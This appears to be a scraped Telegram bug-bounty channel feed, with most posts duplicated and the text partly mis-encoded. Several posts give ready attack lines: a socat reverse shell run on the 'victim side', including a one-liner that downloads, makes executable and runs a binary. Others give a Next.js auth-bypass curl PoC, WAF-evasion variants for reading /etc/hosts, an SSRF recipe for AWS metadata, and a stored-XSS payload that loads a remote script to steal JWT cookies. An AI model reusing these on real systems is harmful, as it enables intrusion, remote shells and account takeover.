π₯With the right dork, the whole game changesβrecon becomes domination.π
Dork:
For more followππΌ DarkShadow
#bugbountytips
Dork:
inurl:search.php inurl:sqlQuery inurl:&For more followππΌ DarkShadow
#bugbountytips
π17π₯5β€1π1π³1
π This is wild!
Youβve probably seen the buzz around the Next.js middleware auth bypass (CVE-2025-29927) β but thereβs another less-known yet similar vulnerability: CVE-2024-51479.
This flaw allows attackers to bypass authentication by abusing the __nextLocale query parameter in the URL, tricking the middleware into granting access to protected routes.
Proof of Concept (PoC):
This vulnerability was fixed in Next.js v14.2.15, and Vercel-hosted apps have already been patched automatically.
I found a very cool article explaining everything in detail:
https://gmo-cybersecurity.com/blog/another-nextjs-middleware-bypass-en
Youβve probably seen the buzz around the Next.js middleware auth bypass (CVE-2025-29927) β but thereβs another less-known yet similar vulnerability: CVE-2024-51479.
This flaw allows attackers to bypass authentication by abusing the __nextLocale query parameter in the URL, tricking the middleware into granting access to protected routes.
Proof of Concept (PoC):
curl https://target.com/?__nextLocale=/adminThis vulnerability was fixed in Next.js v14.2.15, and Vercel-hosted apps have already been patched automatically.
I found a very cool article explaining everything in detail:
π8β€5π₯5π3π«‘1
This media is not supported in your browser
VIEW IN TELEGRAM
π New Script Alert β Subdomain Monitoring (Coming Soon!)
from Brut Security
For those whoβve been waiting on a simple and efficient way to monitor subdomains automatically β your wait is almost over. π
Weβve been working on a Bash script that:
β Monitors your target domains every 6 hours
β Uses subfinder, anew, and notify
β Sends actual new subdomains as file attachments directly to your Discord webhook
β Clean, lightweight & made for practical usage in recon and bug bounty
The release isnβt today β dropping next week, but thought Iβd give you all a heads-up.
If youβre into bug hunting, automation, or OSINT β this might be super useful for your workflow.
π Share with your team
β€οΈ React if youβre excited
Letβs get the word out before the launch!
#BrutSecurity #bugbounty #subdomainmonitoring #infosec #recon #bashscript #automation
from Brut Security
For those whoβve been waiting on a simple and efficient way to monitor subdomains automatically β your wait is almost over. π
Weβve been working on a Bash script that:
β Monitors your target domains every 6 hours
β Uses subfinder, anew, and notify
β Sends actual new subdomains as file attachments directly to your Discord webhook
β Clean, lightweight & made for practical usage in recon and bug bounty
The release isnβt today β dropping next week, but thought Iβd give you all a heads-up.
If youβre into bug hunting, automation, or OSINT β this might be super useful for your workflow.
π Share with your team
β€οΈ React if youβre excited
Letβs get the word out before the launch!
#BrutSecurity #bugbounty #subdomainmonitoring #infosec #recon #bashscript #automation
21β€30π6π₯4π2
API_Hacking_with_Javascript_Checklist.pdf
47.1 MB
API Hacking with Javascript Checklist - 5 things that you should look for in JS files for API hacking.
π₯22β€13
β‘Convert your basic nc reverse shell to a pro interactive shellπ
β‘Bash Series for bug huntersπ
Part-1
Use python to Spawn a TTY shell:
Use this command to use clear command:
Get a sexy shell prompt:
Use those alias for speed up:
To close the shell temporally:
Press control+Z
Use this command to back again session:
Guys, do you all want a smart alternative to nc where you can use nano, vim, and have full keyboard controls (like Ctrl+C, etc.)?
πFollow meππΌ DarkShadow
#Bugbountytips #series@brutsecurity
β‘Bash Series for bug huntersπ
Part-1
Use python to Spawn a TTY shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'Use this command to use clear command:
export TERM=xterm-256colorGet a sexy shell prompt:
PS1='\[\033[01;32m\]\u@\h \[\033[01;34m\]\w\[\033[01;31m\]$\[\033[00m\] 'Use those alias for speed up:
export EDITOR=nano
alias mm=clear
alias ls='ls --color=auto'
alias ll='ls -la --color=auto'
alias grep='grep --color=auto'To close the shell temporally:
Press control+Z
Use this command to back again session:
stty raw -echo; fgGuys, do you all want a smart alternative to nc where you can use nano, vim, and have full keyboard controls (like Ctrl+C, etc.)?
πFollow meππΌ DarkShadow
#Bugbountytips #series@brutsecurity
π₯10πΏ8π5
β‘Bypass Series for bug huntersπ
Part-3
Crazy WAF Bypass:
cat /etc/hosts - triggers WAF
πFollow meππΌ DarkShadow
#Bugbountytips #series@brutsecurity
Part-3
Crazy WAF Bypass:
cat /etc/hosts - triggers WAF
cat < /etc/hostscat /proc/self/fd/0 < /etc/hostscat /etc/hosts | base64 | base64 -dcat /etc/hosts | string collectcat /etc/hosts | while read line; echo $line; end
echo (cat /etc/hosts)
πFollow meππΌ DarkShadow
#Bugbountytips #series@brutsecurity
π8β€5π₯3
β‘Bash Series for bug huntersπ
Part-2
Stop using directly nc and try with the following command:
Or
Now you can use arrow keys for command history navigation, but you still won't get full keyboard functionality (e.g., nano, CTRL shortcuts).
For full interactive keyboard controls, use a socat interactive shell:
On attacker side:
If it throws any error, try:
socat file:$(tty),raw,echo=0 tcp-listen:<port>
On victim side (for a full TTY reverse shell):
If socat is not installed on the victim machine, use this one-liner to download a static binary:
to stop socat:
Note: Replace <port> with your desired port, <attacker_ip> with your IP, and <PID> with the process ID.
πFollow meππΌ DarkShadow
#Bugbountytips #series@brutsecurity
Part-2
Stop using directly nc and try with the following command:
rlwrap -cAr nc -lvnp <port>Or
rlwrap -f . -r nc -lnvp <port>Now you can use arrow keys for command history navigation, but you still won't get full keyboard functionality (e.g., nano, CTRL shortcuts).
For full interactive keyboard controls, use a socat interactive shell:
On attacker side:
socat file:tty,raw,echo=0 tcp-listen:<port>If it throws any error, try:
socat file:$(tty),raw,echo=0 tcp-listen:<port>
On victim side (for a full TTY reverse shell):
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<ip>:<port>If socat is not installed on the victim machine, use this one-liner to download a static binary:
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<ip>:<port>to stop socat:
ps aux | grep socatKill -9 socat <PID>Note: Replace <port> with your desired port, <attacker_ip> with your IP, and <PID> with the process ID.
πFollow meππΌ DarkShadow
#Bugbountytips #series@brutsecurity
π₯9β€2π1
β‘HackerOne was vulnerable to a critical SSRF that allowed reading AWS metadata β disclosed and rewarded $25,000! π€―
π The Core Issue:
An SSRF via a <template> field allowed AWS credential access by injecting an <iframe> when generating a PDF report from analytics.
POC Steps:
1. Go to https://hackerone.com/organizations/ORG/analytics/reports
2. Create a new report
3. Select any filters
4. Click βApplyβ (intercept the request here)
5. In any template field, inject an HTML payload
6. Use an <iframe> to read internal files like AWS metadata
Even though it's an old report, the technique builds solid SSRF understanding.
If you're into smart and simple exploitation tricks β donβt forget to react & share β€οΈ
πFollow meππΌ DarkShadow
π The Core Issue:
An SSRF via a <template> field allowed AWS credential access by injecting an <iframe> when generating a PDF report from analytics.
POC Steps:
1. Go to https://hackerone.com/organizations/ORG/analytics/reports
2. Create a new report
3. Select any filters
4. Click βApplyβ (intercept the request here)
5. In any template field, inject an HTML payload
6. Use an <iframe> to read internal files like AWS metadata
Even though it's an old report, the technique builds solid SSRF understanding.
If you're into smart and simple exploitation tricks β donβt forget to react & share β€οΈ
πFollow meππΌ DarkShadow
π₯28β€10πΏ9π5π«‘2
This is really cool π₯
An FFUF wrapper by @rez0__ that automatically suggests file extensions for fuzzing by analysing target URL and headers.
https://github.com/jthack/ffufai?tab=readme-ov-file
#bugbountytips #bugbounty #cybersecurity
An FFUF wrapper by @rez0__ that automatically suggests file extensions for fuzzing by analysing target URL and headers.
https://github.com/jthack/ffufai?tab=readme-ov-file
#bugbountytips #bugbounty #cybersecurity
π13π₯2
β‘Bypass Series for bug huntersπ
Part-4
Crazy WAF Bypass:
cat /etc/hosts - triggers WAF
Guys, what do you think about those WAF bypass techniques I created?
Hold on for the last one β it's really awesome!π
πFollow meππΌ DarkShadow
#Bugbountytips #series@brutsecurity
Part-4
Crazy WAF Bypass:
cat /etc/hosts - triggers WAF
rev /etc/hosts | revod -An -c /etc/hosts | tr -d ' 'cat $HOME/../../etc/hostscat ${PWD}/../../../etc/hostsgrep "" /etc/hostscut -c1- /etc/hostspaste /etc/hostsGuys, what do you think about those WAF bypass techniques I created?
Hold on for the last one β it's really awesome!π
πFollow meππΌ DarkShadow
#Bugbountytips #series@brutsecurity
π₯9β€7π5
β‘Bash Series for bug huntersπ
Part-2
Create multiple folders using one-liner:
This command will create 3 directories (dev, test, prod) at a time.
Creating Multiple Files Efficiently:
File creates like file1.txt, file2.txt file3.txt
Generating Files with Numeric Sequences:
This sequence creates file's:
file01.txt, file02.txt, file03.txt .... To file10.txt
Boost your bug hunting with pro Bash commands β a must for every hacker!
Don't forget to reactπ₯
πFollow meππΌ DarkShadow
#Bugbountytips #series@brutsecurity
Part-2
Create multiple folders using one-liner:
mkdir {dev,test,prod}This command will create 3 directories (dev, test, prod) at a time.
Creating Multiple Files Efficiently:
touch {file1,file2,file3}.txtFile creates like file1.txt, file2.txt file3.txt
Generating Files with Numeric Sequences:
seq -w 1 10 | xargs -I {} touch file{}.txtThis sequence creates file's:
file01.txt, file02.txt, file03.txt .... To file10.txt
Boost your bug hunting with pro Bash commands β a must for every hacker!
Don't forget to reactπ₯
πFollow meππΌ DarkShadow
#Bugbountytips #series@brutsecurity
π₯13π4
program-list.json
1.1 MB
πHelpful Websites for Finding Bug Bounty and Vulnerability Disclosure Programs.β‘
Explore databases that list active bug bounty and vulnerability disclosure programs to help security researchers find opportunities to report vulnerabilities and earn rewards.
https://disclose.io/programs/
You can also download all programs in JSON format, provided the JSON file.
Don't forget to react π₯
π Follow me ππΌ DarkShadow
#BugBountytips
Explore databases that list active bug bounty and vulnerability disclosure programs to help security researchers find opportunities to report vulnerabilities and earn rewards.
https://disclose.io/programs/
You can also download all programs in JSON format, provided the JSON file.
π Follow me ππΌ
#BugBountytips
π₯22π3π€2
β‘Popular HackerOne target Agoda.com was vulnerable to Stored XSS β Rewarded $3,200π¬
πCore Issue:
By adding a new property (Apartment/Flat) and injecting a malicious script, the backend failed to properly sanitize user input. Validation was only enforced on the frontend.
πAffected Functionality:
Property listing creation, including:
ββ’ Property Name
ββ’ Property Description
ββ’ Company Name
ββ’ Company Address
π₯Injection Payload:
π₯Impact:
On page load, the stored XSS steals the userβs JWT token from cookies, enabling full account takeover with zero user interaction.
π Follow meππΌ DarkShadow
#BugBountytips
πCore Issue:
By adding a new property (Apartment/Flat) and injecting a malicious script, the backend failed to properly sanitize user input. Validation was only enforced on the frontend.
πAffected Functionality:
Property listing creation, including:
ββ’ Property Name
ββ’ Property Description
ββ’ Company Name
ββ’ Company Address
π₯Injection Payload:
"><script src=https://hackbx.bxss.in></script>
This single payload can be used to execute thousands of XSS scripts.
π₯Impact:
On page load, the stored XSS steals the userβs JWT token from cookies, enabling full account takeover with zero user interaction.
π Follow meππΌ DarkShadow
#BugBountytips
πΏ12β€4π₯4π1π¨βπ»1
What do you think about these kinds of proof-of-concepts and bug bounty tips?
Drop your thoughts in the comments β Iβd love to hear your feedback and what you'd like to see next!πβ€οΈ
Drop your thoughts in the comments β Iβd love to hear your feedback and what you'd like to see next!πβ€οΈ
β€24π11
We enabled copyright protection because many people keeps copying our posts and sharing them on their X accounts, Telegram channels, and groups without any effort. The most frustrating part is that they donβt even mention or credit us after copying our content.
π25β€13π’4
Brut Security pinned Β«We enabled copyright protection because many people keeps copying our posts and sharing them on their X accounts, Telegram channels, and groups without any effort. The most frustrating part is that they donβt even mention or credit us after copying our content.Β»
β‘Bypass Series for bug huntersπ
Part-5 (last part)
Crazy WAF Bypass:
cat /etc/hosts - triggers WAF
guys, these are some custom payloads I personally crafted β highly effective at bypassing firewalls and evading detection.
For more follow meππΌ DarkShadow
#Bugbountytips #series@brutsecurity
Part-5 (last part)
Crazy WAF Bypass:
cat /etc/hosts - triggers WAF
tar cf - /etc/hosts | tar xf - -O gzip -c /etc/hosts | gzip -dless /e*c/h*st*more /e{t,c}*/{o,h}*s*{s,t}strings /??c/??stssort /etc/hosts | uniq guys, these are some custom payloads I personally crafted β highly effective at bypassing firewalls and evading detection.
For more follow meππΌ DarkShadow
#Bugbountytips #series@brutsecurity
π₯13π€3π2π¨βπ»2